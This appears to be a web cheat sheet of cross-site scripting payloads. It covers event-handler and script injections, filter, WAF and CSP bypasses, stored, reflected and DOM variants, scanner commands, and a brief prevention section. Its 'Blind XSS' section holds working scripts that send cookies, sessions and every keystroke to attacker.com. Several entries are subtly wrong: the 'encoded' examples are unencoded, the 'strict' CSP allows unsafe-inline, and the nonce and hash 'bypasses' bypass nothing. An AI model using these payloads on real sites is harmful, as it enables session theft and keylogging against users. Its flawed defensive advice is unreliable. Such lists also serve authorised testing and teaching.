XSS Payloads
XSS Payloads
Comprehensive collection of Cross-Site Scripting (XSS) payloads and bypass techniques.
Basic XSS Payloads
Simple Alert
<script>alert('XSS')</script>
<script>alert(1)</script>
<script>alert(document.domain)</script>
<script>alert(document.cookie)</script>
Image Tag
<img src=x onerror=alert('XSS')>
<img src="javascript:alert('XSS')">
<img src=x onerror=alert(1)>
<img src=x onerror=alert(document.cookie)>
Input Tag
<input onfocus=alert('XSS') autofocus>
<input onmouseover=alert('XSS')>
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
Event Handlers
Mouse Events
<div onmouseover=alert('XSS')>Hover me</div>
<div onmouseenter=alert('XSS')>Enter me</div>
<div onmouseleave=alert('XSS')>Leave me</div>
<div onmousedown=alert('XSS')>Click me</div>
<div onmouseup=alert('XSS')>Release me</div>
<div onclick=alert('XSS')>Click me</div>
<div ondblclick=alert('XSS')>Double click me</div>
Keyboard Events
<input onkeydown=alert('XSS')>
<input onkeyup=alert('XSS')>
<input onkeypress=alert('XSS')>
<input onkeydown=alert(1)>
<input onkeyup=alert(1)>
<input onkeypress=alert(1)>
Form Events
<form onsubmit=alert('XSS')>
<input onchange=alert('XSS')>
<input oninput=alert('XSS')>
<input oninvalid=alert('XSS')>
<input onreset=alert('XSS')>
<input onsearch=alert('XSS')>
Window Events
<body onload=alert('XSS')>
<body onunload=alert('XSS')>
<body onbeforeunload=alert('XSS')>
<body onresize=alert('XSS')>
<body onscroll=alert('XSS')>
<body onfocus=alert('XSS')>
<body onblur=alert('XSS')>
Filter Bypass Techniques
Case Variation
<SCRIPT>alert('XSS')</SCRIPT>
<ScRiPt>alert('XSS')</ScRiPt>
<script>alert('XSS')</script>
<SCRIPT>alert('XSS')</SCRIPT>
Encoding Bypass
<!-- URL Encoding -->
%3Cscript%3Ealert('XSS')%3C/script%3E
%3Cimg%20src=x%20onerror=alert('XSS')%3E
<!-- HTML Entities -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Hex Encoding -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Unicode -->
\u003cscript\u003ealert('XSS')\u003c/script\u003e
Quote Bypass
<!-- Without quotes -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
<img src=x onerror=alert(XSS)>
<!-- With different quote types -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert("XSS")>
<img src=x onerror=alert(`XSS`)>
Space Bypass
<!-- Tab -->
<img src=x onerror=alert('XSS')>
<!-- Newline -->
<img
src=x
onerror=alert('XSS')>
<!-- Carriage return -->
<img
src=x
onerror=alert('XSS')>
<!-- Form feed -->
<img
src=x
onerror=alert('XSS')>
Comment Bypass
<!-- HTML Comments -->
<img src=x onerror=alert('XSS')><!--
<img src=x onerror=alert('XSS')>-->
<!-- JavaScript Comments -->
<script>/*comment*/alert('XSS')</script>
<script>//comment
alert('XSS')</script>
Advanced Bypass Techniques
WAF Bypass
<!-- OWASP ModSecurity -->
<svg onload=alert('XSS')>
<iframe onload=alert('XSS')>
<object onload=alert('XSS')>
<embed onload=alert('XSS')>
<!-- Cloudflare -->
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert('XSS')>
<img src=x onerror=alert('XSS')>
CSP Bypass
<!-- Nonce bypass -->
<script nonce="random">alert('XSS')</script>
<!-- Hash bypass -->
<script>alert('XSS')</script>
<!-- Source bypass -->
<script src="data:text/javascript,alert('XSS')"></script>
<script src="javascript:alert('XSS')"></script>
DOM-based XSS
// URL Fragment
#<script>alert('XSS')</script>
#<img src=x onerror=alert('XSS')>
// Hash change
window.location.hash = "<script>alert('XSS')</script>";
// Document write
document.write('<script>alert("XSS")</script>');
// InnerHTML
element.innerHTML = '<script>alert("XSS")</script>';
// Eval
eval('alert("XSS")');
Stored XSS Payloads
Profile Fields
<!-- Name field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Bio field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
<!-- Comment field -->
<script>alert('XSS')</script>
<img src=x onerror=alert('XSS')>
File Upload
<!-- Image file -->
<img src=x onerror=alert('XSS')>
<!-- SVG file -->
<svg onload=alert('XSS')>
<!-- HTML file -->
<script>alert('XSS')</script>
Reflected XSS Payloads
URL Parameters
<!-- GET parameter -->
?search=<script>alert('XSS')</script>
?search=<img src=x onerror=alert('XSS')>
<!-- POST parameter -->
username=<script>alert('XSS')</script>
password=<img src=x onerror=alert('XSS')>
Headers
<!-- User-Agent -->
User-Agent: <script>alert('XSS')</script>
<!-- Referer -->
Referer: <script>alert('XSS')</script>
<!-- X-Forwarded-For -->
X-Forwarded-For: <script>alert('XSS')</script>
Blind XSS Payloads
Data Exfiltration
<!-- Basic exfiltration -->
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/steal?data=' + document.cookie);
xhr.send();
</script>
<!-- Image exfiltration -->
<img src="http://attacker.com/steal?data=document.cookie">
<!-- Form exfiltration -->
<form action="http://attacker.com/steal" method="post">
<input type="hidden" name="data" value="document.cookie">
</form>
Keylogger
<script>
document.addEventListener('keypress', function(e) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/keylog?key=' + e.key);
xhr.send();
});
</script>
Session Hijacking
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://attacker.com/session?cookie=' + document.cookie);
xhr.send();
</script>
Mobile XSS Payloads
Touch Events
<div ontouchstart=alert('XSS')>Touch me</div>
<div ontouchend=alert('XSS')>Touch me</div>
<div ontouchmove=alert('XSS')>Touch me</div>
<div ontouchcancel=alert('XSS')>Touch me</div>
Orientation Events
<div onorientationchange=alert('XSS')>Rotate me</div>
<div onresize=alert('XSS')>Resize me</div>
Testing Tools
XSSer
# Basic scan
xsser --url="http://target.com/page.php?search=test"
# With payloads
xsser --url="http://target.com/page.php?search=test" --payload="<script>alert('XSS')</script>"
# With encoding
xsser --url="http://target.com/page.php?search=test" --encode
XSStrike
# Basic scan
python3 xsstrike.py -u "http://target.com/page.php?search=test"
# With crawling
python3 xsstrike.py -u "http://target.com/page.php?search=test" --crawl
# With blind XSS
python3 xsstrike.py -u "http://target.com/page.php?search=test" --blind
Custom Script
import requests
import re
def test_xss(url, param, payload):
data = {param: payload}
response = requests.post(url, data=data)
if payload in response.text:
print(f"XSS detected: {payload}")
elif "alert" in response.text.lower():
print(f"XSS detected: {payload}")
# Test payloads
payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg onload=alert('XSS')>",
"<iframe onload=alert('XSS')>"
]
for payload in payloads:
test_xss("http://target.com/search.php", "query", payload)
Prevention and Mitigation
Input Validation
# Whitelist validation
import re
def validate_input(input_str):
# Allow only alphanumeric and basic punctuation
pattern = r'^[a-zA-Z0-9\s.,!?]+$'
return re.match(pattern, input_str) is not None
Output Encoding
import html
def encode_output(input_str):
return html.escape(input_str)
Content Security Policy
<!-- Strict CSP -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self' 'unsafe-inline';">
<!-- Nonce-based CSP -->
<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'nonce-random'">
Testing Checklist
- Test all input fields
- Test with different HTTP methods
- Test with different content types
- Test with different encodings
- Test with different quote types
- Test with different event handlers
- Test with different tag types
- Test with different bypass techniques
- Test with different WAF bypasses
- Test with different CSP bypasses